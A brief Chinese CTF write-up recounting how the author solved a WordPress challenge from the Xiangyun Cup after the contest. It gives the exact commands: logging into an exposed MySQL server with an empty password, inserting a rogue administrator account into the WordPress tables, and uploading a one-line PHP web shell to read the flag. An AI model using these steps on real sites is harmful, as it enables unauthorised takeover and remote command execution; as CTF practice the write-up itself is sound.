一直在打祥云杯。。赛后来复现下
看wordpress的文章。他里面mysql有条命令是连接8500端口
mysql -h 42.192.72.11 -P 8500 -uwww-data
空密码进入然后添加wordpress的用户
insert into wp_users values("3","guoke","$P$BBtFr9ZBqq5klH.gVcG.bZlbjWV9gn.","guoke","guoke@qq.com","http://59.110.157.4:8000/wordpress","2020-11-13 03:49:26","",0,"guoke");
insert into wp_usermeta values("25","3","wp_capabilities",'a:1:{s:13:"administrator";b:1;}');
insert into wp_usermeta values("26","3","wp_userlevel","10");
进入后台后。插件功能上传一句话。
wordpress/wp-content/uploads/2020/11/test1.php?1=cat /flag